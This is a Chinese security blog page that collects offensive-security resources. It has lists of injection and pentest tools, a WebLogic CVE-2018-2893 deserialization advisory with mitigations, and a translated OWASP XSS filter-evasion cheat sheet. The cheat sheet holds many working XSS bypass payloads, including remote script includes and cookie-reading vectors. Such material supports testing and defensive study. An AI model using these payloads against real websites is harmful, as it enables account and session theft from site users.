欢迎光临
我们一直在努力
        找回密码
"

资源分享

去分类设置中添加分类描述吧

注入资源汇总PE注入,DLL注入,代码注入,Shellcode注入,ELF注入

legend阅读(983)评论(0)

PE注入

工具

文章

DLL注入

集合

工具

文章

逐步注入

工具

文章

螺纹注入

工具

文章

代码注入

工具

文章

Shellcode注入

工具

文章

ELF注入

工具

  • 269星] [10d] [Shell] cytopia / pwncat pwncat-使用防火墙,IDS / IPS规避,绑定和反向shell,自注入shell和端口转发魔术的类固醇上的netcat-以及可完全用Python(PSE)编写的脚本
  • 106星] [14d] [C] comsecuris / luaqemu基于QEMU的框架,将多个QEMU内部API暴露给注入QEMU本身的LuaJIT核心。除其他外,这允许对目标系统进行快速原型制作,而无需任何本地代码,并且在Lua中的工作量最小。
  • 73星] [10d] [C] zznop / drow在构建后将代码注入ELF可执行文件
  • 45星] [1m] [C] 扩展名/ evilelf恶意使用ELF,例如.so注入,func钩子等。
  • 26星] [4m] [C ++] shaxzy / nixware-csgo Nixware的源代码。作弊由于某种原因而无法注入,无法修复或仅从其中粘贴
  • 9星] [3m] [C] mfaerevaag / elfinjector用于ELF二进制文件的代码注入器(包括PIE)
  • 1星] [2y] [JS] mshoop / web-xss-attack通过跨站点脚本攻击,恶意注入的JavaScript和自传播蠕虫来探索网站安全

文章

Dylib注入

工具

  • 2032星] [3y] [Swift] urinx / iosapphook专注于非越狱环境下iOS应用逆向研究,从dylib注入,应用重签名到App Hook
  • 752星] [5y] [ObjC] kjcracks / yololib dylib注入器,用于mach-o二进制文件
  • 506星] [13d] [Objective-C ++] bishopfox / bfinject Dylib注入,适用于iOS 11.0-11.1.2,带有LiberiOS和Electra越狱
  • 191星] [3m] [Swift] 编码/ 注入OS X的应用程序,该应用程序可以注入dylib和(重新)签名应用程序,并将它们捆绑到准备安装在iOS设备上的ipa文件中。
  • 173星] [16d] [C] scen / osxinj osx dylib注射

文章

安卓系统

工具

文章

其他

工具

2018-BlackHat-Tools-List

legend阅读(8839)评论(0)

Android,iOS和移动黑客

易受攻击的iOS应用程序:Swift版

https://github.com/prateek147/DVIA-v2

代码评估

OWASP依赖性检查

https://github.com/jeremylong/DependencyCheck

美洲狮扫描

https://github.com/pumasecurity/puma-scan

加密

DeepViolet:SSL / TLS扫描API和工具

https://github.com/spoofzu/DeepViolet

数据取证和事件响应

初学者到专家

https://github.com/bro/bro

CyBot:开源威胁情报聊天机器人

https://github.com/CylanceSPEAR/CyBot

LogonTracer

https://github.com/JPCERTCC/LogonTracer

rastrea2r(重新加载!):用Gusto和Style收集和狩猎IOC

https://github.com/rastrea2r/rastrea2r

RedHunt OS(VM):用于对手仿真和威胁搜索的虚拟机

https://github.com/redhuntlabs/RedHunt-OS

剥削与道德黑客

AVET:AntiVirus Evasion Tool

https://github.com/govolution/avet

DSP:Docker安全游乐场

https://github.com/giper45/DockerSecurityPlayground

hideNsneak:攻击混淆框架

https://github.com/rmikehodges/hideNsneak

梅林

https://github.com/Ne0nd0g/merlin

RouterSploit

https://github.com/threat9/routersploit

硬件/嵌入式

ChipWhisperer

https://github.com/newaetech/chipwhisperer

JTAGulator :揭开硬件安全的致命弱点

https://github.com/grandideastudio/jtagulator

Micro-Renovator:将处理器固件带入代码

https://github.com/syncsrc/MicroRenovator

TumbleRF:RF模糊变得容易

https://github.com/riverloopsec/tumblerf

Walrus:充分利用您的卡片克隆设备

https://github.com/TeamWalrus/Walrus

物联网

物联网设备的可扩展动态分析框架

https://github.com/sycurelab/DECAF

BLE CTF项目

https://github.com/hackgnar/ble_ctf

WHID注射器和WHID Elite:新一代HID攻击性设备

https://github.com/whid-injector/WHID

恶意软件防御

为每位安全研究人员提供高级深度学习分析平台

https://github.com/intel/Resilient-ML-Research-Platform

EKTotal

https://github.com/nao-sec/ektotal

固件审计:Blue Teams和DFIR的平台固件安全自动化

https://github.com/PreOS-Security/fwaudit

MaliceIO

https://github.com/maliceio/malice

目标 – 参见MacOS安全工具

https://github.com/objective-see

恶意软件进攻

BloodHound 1.5

https://github.com/BloodHoundAD/BloodHound

网络攻击

军械库

https://github.com/depthsecurity/armory

Chiron:一种先进的IPv6安全评估和渗透测试框架

https://github.com/aatlasis/Chiron

DELTA:SDN安全评估框架

https://github.com/OpenNetworkingFoundation/DELTA

Mallet:任意协议的拦截代理

https://github.com/sensepost/mallet

PowerUpSQL:用于在企业环境中攻击SQL Server的PowerShell工具包

https://github.com/NetSPI/PowerUpSQL

WarBerryPi

https://github.com/secgroundzero/warberry

网络防御

ANWI(全新无线IDS):5美元的WIDS

https://github.com/SanketKarpe/anwi

CHIRON:基于家庭的网络分析和机器学习威胁检测框架

https://github.com/jzadeh/chiron-elk

云安全套件:AWS / GCP / Azure安全审计的一站式工具

https://github.com/SecurityFTW/cs-suite

DejaVu:一个开源欺骗框架

https://github.com/bhdresh/Dejavu

OSINT – 开源智能

DataSploit 2.0

https://github.com/DataSploit/datasploit

Dradis 框架:了解如何将报告时间缩短一半

https://github.com/dradis/dradis-ce

逆向工程

Snake:恶意软件存储动物园

https://github.com/countercept/snake

智能电网/工业安全

GRFICS :工业控制模拟的图形现实主义框架

https://github.com/djformby/GRFICS

漏洞评估

用于机器学习模型的对抗鲁棒性工具箱

https://github.com/IBM/adversarial-robustness-toolbox

Android动态分析工具(ADA)

https://github.com/ANELKAOS/ada

射箭:开源漏洞评估和管理

https://github.com/archerysec/archerysec

boofuzz

https://github.com/jtpereyda/boofuzz

BTA

https://github.com/airbus-seclab/bta

深度利用

https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/DeepExploit

Halcyon IDE:适用于Nmap脚本开发人员

https://github.com/s4n7h0/Halcyon

SimpleRisk

https://github.com/simplerisk

TROMMEL

https://github.com/CERTCC/trommel

Web AppSec

看看NGINX的ModSec 3.0:软件Web应用程序防火墙

https://github.com/SpiderLabs/ModSecurity

Astra:REST API的自动安全测试

https://github.com/flipkart-incubator/Astra

Burp Replicator:自动化复杂漏洞的复制

https://github.com/PortSwigger/replicator

OWASP进攻性Web测试框架

https://github.com/owtf/owtf

OWASP JoomScan项目

https://github.com/rezasp/joomscan

WSSAT

https://github.com/YalcinYolalan/WSSAT

转载请注明: 转载自Legend‘s BLog

本文链接地址: 2018-BlackHat-Tools-List

Webkiller – Python编写的信息收集工具

legend阅读(9082)评论(0)

经过测试以下系统安装成功

  • Kali Linux 2018.2
  • Windows 10

关于工具安装

详情可访问

https://github.com/ultrasecurity/webkiller

 

转载请注明: 转载自Legend‘s BLog

本文链接地址: Webkiller – Python编写的信息收集工具

Black Owl – 基于Operative-Framework收集信息工具

legend阅读(5568)评论(0)

这是一个基于Operative-Framework收集信息的简单工具。

关于安装实用

模块/核心/模块/

  • CMS 收集:CMS Detection
  • 电邮至域名: Get domain with email
  • 黑客电子邮件: Check if email as been hacked
  • IP 地理位置:Obtain IP geolocation information
  • Namech_k: Get info on a specific person with his username
  • 子域名搜索: Search for subdomain
  • Whois域名: Whois information for domain

 

 

转载请注明: 转载自Legend‘s BLog

本文链接地址: Black Owl – 基于Operative-Framework收集信息工具

【漏洞预警】WebLogic T3 反序列化绕过漏洞 & 附检测POC

legend阅读(8690)评论(0)

漏洞描述

Oracle FusionMiddleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。

Oracle官方发布了4月份的关键补丁更新CPU(Critical PatchUpdate),其中包含一个高危的Weblogic反序列化漏洞CVE-2018-2628,该漏洞修补不善导致被绕过。Oracle 官方发布的7月份补丁中修复了该漏洞,分配了漏洞编号CVE-2018-2893。

通过该漏洞,攻击者可以在未授权的情况下远程执行代码。攻击者只需要发送精心构造的T3协议数据,就可以获取目标服务器的权限。攻击者可利用该漏洞控制组件,影响数据的可用性、保密性和完整性。

漏洞版本

Oracle WebLogic Server 10.3.6.0

Oracle WebLogic Server 12.1.3.0

Oracle WebLogic Server 12.2.1.2

Oracle WebLogic Server 12.2.1.3

威胁等级

漏洞详情

知识点

  • T3协议

WebLogic Server 中的 RMI 通信使用 T3 协议在WebLogic Server和其他 Java程序(包括客户端及其他 WebLogic Server 实例)间传输数据(序列化的类)。由于WebLogic的T3协议和Web协议共用同一个端口,因此只要能访问WebLogic就可利用T3协议实现payload和目标服务器的通信。

  • JRMP协议

RMI目前使用Java远程消息交换协议JRMP(Java Remote Messaging Protocol)进行通信。JRMP协议是专为Java的远程对象制定的协议。

检测Poc

cve-2018-2893-poc

解决方案

  1. Oracle 官方已经在 7 月份中的补丁中修复了该漏洞,建议受影响的用户尽快升级更新进行防护。

    http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html

  2. 升级到 jdk-8u20以上的版本
  3. 控制T3协议访问

    此漏洞产生于WebLogic的T3服务,因此可通过控制T3协议的访问来临时阻断针对该漏洞的攻击。当开放WebLogic控制台端口(默认为7001端口)时,T3服务会默认开启。

    具体操作:

    (1)进入WebLogic控制台,在base_domain的配置页面中,进入“安全”选项卡页面,点击“筛选器”,进入连接筛选器配置。

    (2)在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则中输入:127.0.0.1 * * allow t3 t3s,0.0.0.0/0 * * deny t3 t3s(t3和t3s协议的所有端口只允许本地访问)。

    (3)保存后需重新启动,规则方可生效。

Fuxi Scanner – 网络安全漏洞扫描器

legend阅读(7721)评论(0)

安装文档

https://github.com/jeffzh3ng/Fuxi-Scanner/blob/master/doc/INSTALL.en.md

使用

漏洞扫描程序扫描
程序模块集成了一个开源的远程漏洞测试和PoC开发框架 –Pocsuite
Like Metasploit,它是一个开发工具包,供人员开发自己的漏洞。基于Pocsuite,您可以编写最核心的PoC / Exp代码而无需关心最终的输出等。至少有几百人根据Pocsuite最新编写PoC / Exp。
您可以从 Seebug社区获取PoC脚本

。目标可以是IP,网段或URL。

您可以在插件管理器模块中管理插件。该插件必须符合PoC编码样式

资产管理
IT资产注册:

自动服务发现:

您可以通过搜索和过滤掉特定服务来扫描漏洞

Authentication Tester
这是一个支持许多攻击协议的登录破解程序(HTTP Basic Auth,SSH,MySQL,Redis)。
目标可以是IP,网段或URL。

子域扫描程序
它可以帮助渗透测试人员和漏洞搜索者收集和收集他们所定位的域的子域名
您可以在设置中改进wordlist以查找更多子域名

 

Acunetix扫描仪
此模块通过集成Acunetix Web 漏洞扫描API来提供扫描任务

您可以同时扫描多个网站

端口扫描程序
端口扫描程序允许您发现目标主机上打开的TCP端口。
端口扫描通常在渗透测试的初始阶段完成,以便发现进入目标系统的所有网络入口点

设置

链接

转载请注明: 转载自Legend‘s BLog

本文链接地址: Fuxi Scanner – 网络安全漏洞扫描器

XSS Filter Evasion Cheat Sheet(XSS BYPASS备忘录)

legend阅读(21407)评论(0)

D:\legend\Documents\WeChat Files\legenddududu\HDHeadImage\ed5eadcb8743f0b0c54a4c0d31d3139a_1.jpg

Xss Bypass备忘录

技术要发展,免不了风波.

也许这些攻攻防防会更好的促进技术的发展也说不定

就让这一次次的爆破换来将来更精练的技术的无比的宁静吧

我们静观其变吧!

缅怀当初那份最纯真Hacker精神!!

2017.深圳

By:Legend

译文源起

翻译本文最初源自国内在对2014年老道翻译的一个版本,发现此版本有些翻译个人认为不太满意,在加上2017年国庆长假漫漫,无人陪伴(主要还是约妹子没约出来!)。所以才对此进行翻译工作,希望对国内各位安全爱好者们有一定帮助吧。请允许译者用自己对此文档见解取一个中文名字—XSS BYPASS备忘录。文中所有代码参考OWASP官方复制,同时对于官方文档里面有些描述不太清楚地方译者通过自己对XSS理解加入一些自己见解,来帮助各位对XSS理解更上一个台阶。,然后如文档之前说带上一个妹子名字。她说名字不让说,那么咱们姑且叫她小星星吧,翻译版权归她所有。对于翻译难免存在错误。请各位看官见谅!

翻译官方修订的版本:10/2/2017

关于译者:ID太多自己都忘记叫那个比较合适,就叫笑摸二楼狗头吧!

译者说明

译者为legend,当然也有人叫我小黑.或者…名字这些都不重要.本文部分章节采用了, OWASP Cheat Sheet Series翻译项目, XSS过滤绕过备忘单[1]部分小段,大概位于”URL字符串绕过”章节特此说明.因为译者认为他们翻译比我更为通顺.其他部分皆为译者结合全文与相关资料而编写,鄙人不认为说比老道版本好多少或者差多少.每个读者感受不一样,我只能说对自己说:我已经尽力了.

如果有兴趣一起交流技术也欢迎联系我.作为一位安全圈萌新,还需要各位大佬带带,最后感谢自己的团队还有各位老铁们支持,如果没有你们意见或许就没有这份文档出现.关于如何联系我?

因上努力,果上随缘

特此说明:备忘录中译者标注和添加解释部分均用插入脚注方式或者如(译者注:)颜色标明,望知晓.

目录

XSS Filter Evasion Cheat Sheet(Chinese) 1

译文源起: 2

译者说明: 2

介绍 6

测试说明 6

XSS漏洞挖掘 6

XSS漏洞挖掘2 6

没有任何过滤的利用 6

常见通用XSS绕过利用代码 7

利用image标签执行Java Script命令 7

对屏蔽引号和分号的绕过 7

敏感字符检测的绕过 7

HTML实体转义 7

利用重音符混淆绕过 7

<a>标签的畸形用法 8

<IMG>标签的畸形用法 8

利用fromCharCoded方法绕过引号限制 8

利用SRC默认属性绕过,SRC域检测限制 8

将SRC默认值为空. 8

完全不设置SRC属性 8

基于erro事件触发 9

IMG onerror和Java script编码绕过 9

十进制在html代码中运用 9

十进制且不带分号在html代码中运用 9

十六进制且不带分号在html代码中运用 9

使用TAB绕过 10

对编码的TAB进行绕过 10

利用换行符来拆解XSS 10

利用回车编码去拆解XSS 10

Null空字符分割javascript指令 10

利用图像元素中Javascript的空格来绕过 10

非字母非数字型XSS 11

多重尖括号 11

没有</script>标签绕过 11

Script标签中协议解析绕过 11

利用括号半开在HTML/JavaScript 进行XSS 11

双半开括号”<<”绕过 12

利用Javascript转义被转义绕过 12

利用</title>标签进行XSS 12

利用<input>标签进行XSS 12

利用<BODY >标签进行XSS 13

利用<img>标签的Dynsrc属性进行XSS 13

利用<img>标签的Lowsrc属性进行XSS 13

利用<img>标签中的VBscript命令进行XSS 13

利用Livescript命令进行XSS(只适用老版本Netscape) 13

利用SVG的<object>标签进行XSS 13

基于ECMAScript 6的XSS 13

利用<BODY>标签ONLOAD属性进行XSS 14

基于事件句柄(或称为:事件处理器) 14

利用< BGSOUND >标签进行XSS 20

利用& JavaScript includes方法进行XSS 20

利用样式表<ink>标签进行XSS 20

利用远程样式表进行XSS 20

利用远程样式表进行XSS part 2 20

利用远程样式表进行XSS part 3 21

利用远程样式表进行XSS part 4 21

利用<style>标签来分解XSS payload 21

利用<img>style属性配合注释符来分解XSS payload 21

利用<style>标签进行分解XSS payload 增强版 21

利用<STYLE>标签(仅限于老版本Netscape) 21

利用<style>标签的background-image属性进行XSS 21

利用<style>标签的background属性进行XSS 22

利用具有style属性的匿名的HTML标签进行XSS 22

利用本地HTC文件进行XSS 22

US-ASCII编码 22

利用< META >标签进行XSS 22

利用<META>标签的content属性进行XSS 22

利用<META>标签的带URL参数进行XSS绕过 23

利用<IFRAME>标签进行XSS 23

利用事件触发<IFRAME>标签的XSS 23

利用<FRAME>进行XSS 23

利用<TABLE>标签进行XSS 23

利用<TD>标签进行XSS 23

利用<DIV>标签 23

在DIV中使用background-image属性完成XSS 23

使用background-image属性配合unicoded编码完成XSS 24

使用background-image属性加上额外字符完成XSS 24

利用DIV表达式完成XSS 24

利用IE注释块进行XSS绕过 24

利用<BASE>标签进行XSS 24

利用<OBJECT>标签进行XSS 24

使用<EMBED>标签嵌入一个包含XSS的Flash动画 25

你可以嵌入包含XSS payload的SVG 25

使用ActionScript来混淆你的XSS payload 25

利用XML数据与CDATA区段混淆进行XSS 25

利用XML的embedded方法在本地XML中嵌入Javascript 26

利用XML中加入HTML+Time元素完成XSS 26

通过简单修改字符去绕过过滤器对”.js”的过滤 26

SSI(服务端包含)进行XSS 26

利用PHP完成XSS 26

利用IMG标签嵌入命令执行XSS 27

利用IMG标签嵌入命令执行XSS part II 27

Cookie篡改 27

利用UTF-7编码进行XSS 27

使用HTML引用封装进行XSS 27

一个令人担忧的XSS payload 28

URL字符串绕过 28

利用IP代替域名 28

利用URL编码 28

利用双字节编码 28

利用十六进制编码 29

利用八进制编码 29

利用混合编码 29

利用协议解析绕过 29

利用Google”手气不错” part 1 29

利用Google”手气不错” part 2 30

利用Google”手气不错” part 3 30

利用删除cnames 30

利用额外点绕过 30

利用Javascript链接地址 30

利用内容替换的payload 30

字符转义表 30

针对跨站脚本攻击-绕过WAF的方法 32

XSS请求重定向 32

针对XSS bypass WAF的字符串 33

利用混淆绕过过滤器 34

作者和主编 34

贡献者 35

其他备忘录 35

介绍

本文重点是为Web应用安全测试人员提供指导,以协助进行XSS安全测试。本文初始内容由于RSNake从他的开创性XSS备忘录捐赠给OWASP,该页面位于http://ha.ckers.org/xss.html。该网站现在重定向到这里https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet。我们计划在这里对它进行维护和更新。同时XSS (Cross Site Scripting) Prevention Cheat Sheet的第一个版本就是受到RSnake的XSS过滤绕过备忘录启发,所以我们要感谢他的灵感。我们希望创建简单,有效指南,开发人员可以遵循指南防止XSS攻击,而不是简单告诉开发人员构造可以防止在本备忘录中所有花哨技巧的程序,因此就有XSS (Cross Site Scripting) Prevention Cheat Sheet等安全备忘录系列诞生。

测试说明

这个Bypass备忘录适用于已经了解XSS攻击基础的人群,同时又希望深入了解防护绕过的细微差别。

请注意,大多数这些XSS payload已经在列出浏览器中进行了测试。

XSS漏洞挖掘

在大多数情况下,如果页面没有对XSS进行特别过滤情况下,在存在XSS地方将会弹出”XSS”一词。可以通过URL编码对整个payload进去编码。小技巧:如果想通过快速方法去判断一个页面是否存在XSS,通常只需要在“<PLAINTEXT>”标签处注入你的payload,看看是否被打乱就可以判断是否存在XSS漏洞了。

‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;

alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–

></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

XSS漏洞挖掘2

如果你没有足够的输入空间,去测试页面是否能执行javascript,则此payload是一个很不错的紧凑型的XSS检测代码。输入代码后,通过此查询页面源代码搜索XSS看他是否存在问题。

”;!–“<XSS>=&{()}

没有任何过滤的利用

这是一个常规的XSS测试代码,也是最容易被拦截的,但是我建议先尝试(关于引号在任何浏览器中都不需要,所以这里省略);

<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>

常见通用XSS绕过利用代码

‘”>><marquee><img src=x onerror=confirm(1)></marquee>”></plaintext\></|\><plaintext/onmouseover=prompt(1)>

<script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’–>”></script>

<script>alert(document.cookie)</script>”>

<img/id=”confirm&lpar;1)”/alt=”/”src=”/”onerror=eval(id)>'”>

<img src=”http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg”>

利用image标签执行Java Script命令

利用image标签配合Javascript命令来实现XSS。(IE7.0浏览器不支持Java Script命令在image标签中触发XSS,但是在可以在其他标签中出发。下面例子仅展示一种,其他标签依旧同样可以。)

<IMG SRC=”javascript:alert(‘XSS’);”>

译者注:如文中所说,还有其他方法.此文档未列出了而已.这里译者简单罗列一下.

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<img src=”URL” style=’Xss:expression(alert(/xss/));’>

对屏蔽引号和分号的绕过

<IMG SRC=javascript:alert(‘XSS’)>

敏感字符检测的绕过

<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

HTML实体转义

此样例中分号是必须要的。

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

利用重音符混淆绕过

如果你需要使用单双引号,但是又被过滤掉,可以使用重音符()[2]来封装你的JavaScript字符串,这个也是很多XSS防护以及过滤器没有考虑到这个字符.

<IMG SRC=javascript:alert(“RSnake says, ‘XSS'”)>

<a>标签的畸形用法

利用Href规定链接目标的特性,从而发起XSS攻击,此想法由David Corss 提出,并且在Chrome浏览器上得到验证.

<a onmouseover="alert(document.cookie)">xss link</a>

此外Chrome喜欢替你做引号补全,如果你遇到不能被执行的话.那么就直接跳过忽略他们即可.因为Chrome会修复你URL或者脚本中丢失的引号,并且将它们补全.

<a onmouseover=alert(document.cookie)>xss link</a>

<IMG>标签的畸形用法

最早被Begeek发现(可谓短小而精悍的运行在任何浏览器上),这个XSS paylod依靠浏览器的渲染引擎解析IMG标签中的XSS payload,该标签必须在引号内运行.我认为这个最初为了纠正错误编码而出现的.这将意味着可以使用难以理解HTML标签去解析.

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

利用fromCharCoded方法绕过引号限制

如果任何形式引号都被拦截的情况下,你可以使用fromCharCode()方法来创造你需要的XSS Payload.

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

利用SRC默认属性绕过,SRC域检测限制

此方法将绕过大多SRC域过滤器,可以利用事件方法插入任意Java script脚本.此方法也同样适用于From,iframe,input,Embed等任何HTML标记类型元素,同时它还允许标记类型相关事件作为备选进行替换,例如onblur,onclick,在后面为你附近一份可用事件表.由于Abdullah Hussam提供. Abdulahhusam编辑.

<IMG SRC=# onmouseover="alert('xxs')">

将SRC默认值为空.

<IMG SRC= onmouseover="alert('xxs')">

完全不设置SRC属性

<IMG onmouseover="alert('xxs')">

基于erro事件触发

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

IMG onerror和Java script编码绕过

<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&

#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083

&#0000083&#0000039&#0000041">

十进制在html代码中运用

此示例所使用的XSS payload无法有些浏览器下使用.<在Gecko引擎下IMG标签在firefox和Netscape 8.1+不起作用>

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;

&#39;&#88;&#83;&#83;&#39;&#41;>

十进制且不带分号在html代码中运用

编码绕过xss过滤器经常会用到"&#XX;",但是大多数人不太知道编码限制最多允许7位字符.导致错误认为一个html编码需要用;去结束,那些对字符串解码也是同样,如$tmp_string =~ s/.*\&#(\d+);.*/$1/.(作者注:无意中发现)

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&

#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

十六进制且不带分号在html代码中运用

这也是针对上述字符串$tmp_string =~ s/.*\&#(\d+);.*/$1/进行XSS攻击.

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

使用TAB绕过

用于绕过某些XSS防护.

<IMG SRC="jav ascript:alert('XSS');">

对编码的TAB进行绕过

使用TAB编码[3]这个来分解XSS.

<IMG SRC="jav&#x09;ascript:alert('XSS');">

利用换行符来拆解XSS

一些人认为09-13(十进制)都可进行此类型攻击,其实非也.其实只有09(tab),10(换行)和13(回车)可以使用.查看ascii表,下面四个示例将展现此payload.

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

利用回车编码去拆解XSS

注意:上面用这些字符串比规定的要长,因为0是可以被省略的.通常我们看到的过滤器绕过十六进制和十进制编码是两到三个字符.正确的应该是一到七个字符.

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

Null空字符分割javascript指令

Null空字符也可以作为XSS payload.但是不能像上边那样.你需要直接写入到他们利用工具中例如burp,或者使用%00字在你的url字符串里.在opera的老板(大概7.11 on windows)对于173个char会受到影响.但是null char %00更有用,并帮助我们绕过某些真实的防护,类似示例中:

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

利用图像元素中Javascript的空格来绕过

XSS过滤匹配模式很多情况都没有考虑”Javascript:”中可能有存在空格的情况,因此否则无法渲染.但是这也是导致错误的假设,认为你不可以有引号和”Javascript:”关键字.实际上,你可以从十进制的%01~%32中得到任何字符;

<IMG SRC=" &#14; javascript:alert('XSS');">

非字母非数字型XSS

Firefox HTML解析器设定一个在html关键字中非字母非数字都不是有效的.因为这些字符会被视为空格或非有效的HTM标签.问题是一些XSS过滤器假设他们正在匹配关键字然后被空格拆解了.例如"<SCRIPT\s" != "<SCRIPT/XSS\s":

<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>

然后,基于上述相同想法,使用Ranke fuzzer进行拓展.Gecko渲染引擎允许字母,数字或者HTML封装字符(如引号,尖括号)之外字符位于事件处理和等号之间.从而绕过XSS过滤器.注意这也只是适用于重音符如下所示:

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^=alert(“XSS”)>

根据Yair Amit提醒,IE和Gecko渲染引擎之间略有不同,只允许标签和参数之间没有空格和斜杠.如果系统不允许空格,这示例可能很有用.

<SCRIPT/SRC=”http://xss.rocks/xss.js”></SCRIPT>

多重尖括号

由Franz Sedlmaier提交,这个XSS paylod可以通过首先使用匹配”<>”的检测引擎,然后通过比较内部标签,而没有使用更加有效的方式(例如匹配整个字符串尖括号和相关标签).”//”注释在结尾的用于防止Javascrip错误.

<<SCRIPT>alert(“XSS”);//<</SCRIPT>

没有</script>标签绕过

在Gecko渲染引擎模式下firefox和netscape8.1中,实际上并不需要常规XSSpayload中的”></script>”部分.firefox会为你非常体贴的安全闭合HTML标签,并且加入闭合标签!这不需要任何额外的HTML.你可以添加引号,如果需要的话.但通常并不是必须的,注意:我不清楚这个代码写入到html代码会闭合成什么样子.

<SCRIPT SRC=http://xss.rocks/xss.js?< B >

Script标签中协议解析绕过

这个玩法由Łukasz Pilorz提出来的,并且Ozh’s基于上下文提出协议解析绕过方法.这个XSS payload运行在IE.Netscape在IE和opera渲染模式中,不需要考虑编码问题,因为浏览器在”.j”写法中,会自动识别<script>标签.这种方法非常有效在输入长度受到限制,时候来进行绕过.当然域名越短越好.

<SCRIPT SRC=//ha.ckers.org/.j>

利用括号半开在HTML/JavaScript 进行XSS

跟firefox不同,IE渲染引擎不会加入额外的数据在你页面上.但是它允许Javascript利用在<img>标签从而产生XSS payload.因为它不需要一个结束”>”尖括号.你可以插入这个XSS向量在任何HTML标签后面.甚至可以不用”>”来闭合标签.注意:这样确实会搞乱HTML,这取决于他下面的HTML.同时对于这种入侵检测系统(NIDS)正则匹配可以直接绕过,表达式为: /((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/ 因为它不需要”>”结束闭合标签.它也是可以有效对抗真实XSS过滤器,我曾经用这种半开的<iframe>标签代替<img>标签去绕过过滤器.

<IMG SRC=”javascript:alert(‘XSS’)”

双半开括号”<<”绕过

使用一个半开的”<”尖括号在payload结尾处代替”>”进行闭合,会在Netscape和Gecko两个渲染下产生不同效果.firefox正常使用,Netscape就不行;

<iframe src=http://xss.rocks/scriptlet.html <

利用Javascript转义被转义绕过

当用户在一个应用程序编辑自定义信息的时候,在常规Javascript代码中是这样,例如: <SCRIPT>var a=”$ENV{QUERY_STRING}”;</SCRIPT>.如果你想插入你自己的Javascript代码时候,会被服务转义掉其中某些引号,这时你需要通过转义被转义字符来绕过它.从而使最终输入代码类似于<SCRIPT>var a=”\\”;alert(‘XSS’);//”;</SCRIPT>.最终双引号被服务器转义,并且触发了XSS payload.示例如下:

\”;alert(‘XSS’);//

另外一种方法就是,如果json或者Javascript转义被应用嵌入数据,而不是HTML编码,则Payload如下示例:

</script><script>alert(‘XSS’);</script>

利用</title>标签进行XSS

这是一个非常easy的XSS payload,可以利用闭合<title>标签,可以封装恶意的XSS攻击.

</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>

利用<input>标签进行XSS

<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>

译者注:其实还可以利用<input>标签中的hideeen属性来触发,网上已经有详细描述,这里就不叙述了,示例如下:

<input type=”hidden” name=”returnurl” value=”[USER INJECT]” />

利用<BODY >标签进行XSS

<BODY BACKGROUND=”javascript:alert(‘XSS’)”>

利用<img>标签的Dynsrc属性进行XSS

<IMG DYNSRC=”javascript:alert(‘XSS’)”>

译者注:不过只在IE和Netscape中支持,Firefox会提示proprietary attribute或者拒绝访问.同时译者在这里说明下,只针对IE6以前,到以后版本就不支持了.望注意(*^__^*).

利用<img>标签的Lowsrc属性进行XSS

<IMG LOWSRC=”javascript:alert(‘XSS’)”>

基于CSS的List-style-image属性进行XSS

使用图像来替换列表项的标记,此Javascript指令只能在IE下使用,是一个不是特别有用的XSS paylod.

<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS</br>

译者注:由于翻译工作占用大量时间,没有在具体环境下测试此paylod,但是理论上” list-style-image”, 所有浏览器都支持 list-style-image 属性。

利用<img>标签中的VBscript命令进行XSS

<IMG SRC=’vbscript:msgbox(“XSS”)’>

利用Livescript命令进行XSS(只适用老版本Netscape)

<IMG SRC=”livescript:[code]”>

利用SVG的<object>标签进行XSS

<svg/onload=alert(‘XSS’)>

基于ECMAScript 6的XSS

Set.constructoralert\x28document.domain\x29

利用<BODY>标签ONLOAD属性进行XSS

此方法不需要”javascript:”或”<script …”任何编码方式来进行XSS攻击. Dan Crowley另外指出,你可以在等号之前放一个空格(“onload=” != “onload =”):

<BODY ONLOAD=alert(‘XSS’)>

基于事件句柄(或称为:事件处理器)

它可以用于上述类似XSS攻击(这是在撰写本文时在网络上最全面的列表了).感谢Rene Ledosquet在HTML+TIME上更新,此外你可以参考Dottoro Web Reference当然还有一份很好的Javascript事件列表.

  1. FSCommand() (攻击者可以使用它当执行一个嵌入的flash对象时)
